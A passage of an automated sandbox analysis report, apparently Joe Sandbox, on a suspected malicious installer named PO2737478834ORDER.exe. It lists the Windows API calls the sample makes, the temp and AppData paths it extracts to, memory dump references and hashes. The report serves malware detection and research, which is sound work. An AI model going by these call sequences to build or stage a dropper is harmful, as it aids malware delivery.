                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%s.dll$UXTHEME$\
                                                        • API String ID: 2200240437-4240819195
                                                        • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                        • Instruction ID: 6b99be200e9776e1d1f000c3a85ac26a44316f32ef7d7cf08124b5af377bafc3
                                                        • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                        • Instruction Fuzzy Hash: C2F0FC305502096BDB15DB64DD0DFEB375CEB08304F1400BAA986E10C1EA78E5258B6D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 847 405c89-405c93 848 405c94-405cbf GetTickCount GetTempFileNameA 847->848 849 405cc1-405cc3 848->849 850 405cce-405cd0 848->850 849->848 852 405cc5 849->852 851 405cc8-405ccb 850->851 852->851
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405C9D
                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CB7
                                                        Strings
                                                        • "C:\Users\user\Desktop\PO2737478834ORDER.exe", xrefs: 00405C89
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C8C
                                                        • nsa, xrefs: 00405C94
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\user\Desktop\PO2737478834ORDER.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-635081233
                                                        • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                        • Instruction ID: eb5fe80d68cc8fd1173ec18eddb4fdb1002e2dce10a9d595da193ea2316e06a4
                                                        • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                        • Instruction Fuzzy Hash: BCF08236308308ABEB118F56ED04B9B7FACDF91750F10803BFA44DB280D6B499558798
                                                        APIs
                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                          • Part of subcall function 004051E8: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000,?), ref: 00405221
                                                          • Part of subcall function 004051E8: lstrlenA.KERNEL32(00403208,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000), ref: 00405231
                                                          • Part of subcall function 004051E8: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00403208,00403208,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,004178E0,00000000), ref: 00405244
                                                          • Part of subcall function 004051E8: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll), ref: 00405256
                                                          • Part of subcall function 004051E8: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040527C
                                                          • Part of subcall function 004051E8: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405296
                                                          • Part of subcall function 004051E8: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052A4
                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2987980305-0
                                                        • Opcode ID: 800416306b2b2cd991b963d049c818197a6c55c3eb730c86b316812b4241bfa1
                                                        • Instruction ID: 1a7932fae63aa7fb20f888994d80958c5ec2ba2518727ce514c528d89b281485
                                                        • Opcode Fuzzy Hash: 800416306b2b2cd991b963d049c818197a6c55c3eb730c86b316812b4241bfa1
                                                        • Instruction Fuzzy Hash: 08210B32A00125EBCF207FA58F49B5F76B0AF50359F21423BF211B61D1CBBC8982965E
                                                        APIs
                                                          • Part of subcall function 00405AF2: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,?,00405B5E,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B00
                                                          • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B05
                                                          • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B19
                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                          • Part of subcall function 004056AE: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056F1
                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72,00000000,00000000,000000F0), ref: 0040163C
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72, xrefs: 00401631
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72
                                                        • API String ID: 1892508949-1706942283
                                                        • Opcode ID: 449cdc4e664ca224a8f4b5777abc43241c6a080200f4575ba897a93c6ca8edfb
                                                        • Instruction ID: 89ad01db463442aa800da85bb51449bf5fbab0d3eae07559ae4194fd3409cb5d
                                                        • Opcode Fuzzy Hash: 449cdc4e664ca224a8f4b5777abc43241c6a080200f4575ba897a93c6ca8edfb
                                                        • Instruction Fuzzy Hash: 05110831604051DBCF307FA54D409BF37B4DE92725B28067FE491B22D3DA3D49426A2E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 126d375e0cd8dd3c96d9f56c9c2b4ea3570e5546f357d91bfce8ff404d349699
                                                        • Instruction ID: 2508fafb39113fa530b835c7ee7350b0f579aeff726ee83cf5aef614fa8a9c48
                                                        • Opcode Fuzzy Hash: 126d375e0cd8dd3c96d9f56c9c2b4ea3570e5546f357d91bfce8ff404d349699
                                                        • Instruction Fuzzy Hash: A3A14271E00229CBDB28CFA8C8547ADBBB1FF44305F15816AD856BB281C7786A96DF44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7d0c270478a2f9a3adf3a01af42e260dfbb4be2f4416bec3860fa0cf1f45473d
                                                        • Instruction ID: f0f32deb93356653934a7f7f8ad788a679267befe7528616fd809e2a8ddaf9c6
                                                        • Opcode Fuzzy Hash: 7d0c270478a2f9a3adf3a01af42e260dfbb4be2f4416bec3860fa0cf1f45473d
                                                        • Instruction Fuzzy Hash: C8913070D00229CBDF28CF98C854BADBBB1FF44305F15816AD856BB281C779AA96DF44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79859cd80aa4a68261cc067353b3b3a3bb11021b997dedf9f01a815f4beecf4f
                                                        • Instruction ID: e43b34c51a548f07c4fb140720fe79cc87a03685924cd857d2d075badb14d917
                                                        • Opcode Fuzzy Hash: 79859cd80aa4a68261cc067353b3b3a3bb11021b997dedf9f01a815f4beecf4f
                                                        • Instruction Fuzzy Hash: 2F815371D04229CBDF24CFA8C8847ADBBB1FB44305F25816AD456BB281C738AA96DF05
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 51f3059c0ab10d0f6eca9bda3b9c7ef9d62a7fb15769fd34cf569834d4f38521
                                                        • Instruction ID: 30cc61a65d8e7361f2687543d4853da4ee9de610700e1b42b944a6768b2f9653
                                                        • Opcode Fuzzy Hash: 51f3059c0ab10d0f6eca9bda3b9c7ef9d62a7fb15769fd34cf569834d4f38521
                                                        • Instruction Fuzzy Hash: D4817771D04229CBDF24CFA9C8447AEBBB0FF44305F21816AD856BB281C7796A86DF45
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae4b4001fee964b3ec39fcc62e642dbd1d089b63cfe1c3a3d4f330af07c9f72e
                                                        • Instruction ID: 0ea1ed3bc64708edefeb163875b4580728164d017b9a5fabf4c3c9e69b53418c
                                                        • Opcode Fuzzy Hash: ae4b4001fee964b3ec39fcc62e642dbd1d089b63cfe1c3a3d4f330af07c9f72e
                                                        • Instruction Fuzzy Hash: 96712371D00229CBDF24CF98C854BADBBB1FF48305F15816AD856B7281C7395A96DF44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46e38dc9042d38c3d36f7f10ec43a7b3aa55cd06347f931a7d3c587032d94121
                                                        • Instruction ID: f909a51a05dfa9c5f202b5373a38b9e5f11f80519cee44c22f430a43d8e85a48
                                                        • Opcode Fuzzy Hash: 46e38dc9042d38c3d36f7f10ec43a7b3aa55cd06347f931a7d3c587032d94121
                                                        • Instruction Fuzzy Hash: 74713371E00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281C7796A96DF44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0acf286bb029991ed8d3626521cf090d2a7bfbfd73cbce5b83777d77729d6ca6
                                                        • Instruction ID: 8ba59c5cd0d20fcb356abc66f065f0fd9b5ab0142fa9d7a08340707df7706276
                                                        • Opcode Fuzzy Hash: 0acf286bb029991ed8d3626521cf090d2a7bfbfd73cbce5b83777d77729d6ca6
                                                        • Instruction Fuzzy Hash: 2A715571D00229CBDF28CF98C844BADBBB1FF44305F15816AD856B7281C779AA96DF44
                                                        APIs
                                                          • Part of subcall function 004064CA: GetModuleHandleA.KERNEL32(?,?,?,00403385,0000000B), ref: 004064DC
                                                          • Part of subcall function 004064CA: GetProcAddress.KERNEL32(00000000,?), ref: 004064F7
                                                        • GetFileVersionInfoSizeA.KERNELBASE(0000000A,00000000,?,000000EE), ref: 00402011
                                                        • GlobalAlloc.KERNEL32(00000040,00000000), ref: 0040202C
                                                          • Part of subcall function 0040601F: wsprintfA.USER32 ref: 0040602C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                        • String ID:
                                                        • API String ID: 2520467145-0
                                                        • Opcode ID: c56d5514332887f87b7b114852f56832af7b712003ae24d7bf8444a6a7704236
                                                        • Instruction ID: 9137dd5190f2cf54ce626747fff572b8624efe90f40858e9bc8fc3c76c4f55a6
                                                        • Opcode Fuzzy Hash: c56d5514332887f87b7b114852f56832af7b712003ae24d7bf8444a6a7704236
                                                        • Instruction Fuzzy Hash: 3C115C71A00208BEDB01EFA5C945A9EBBB4EF04314F10413AF606F6291D7798A94DB28
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
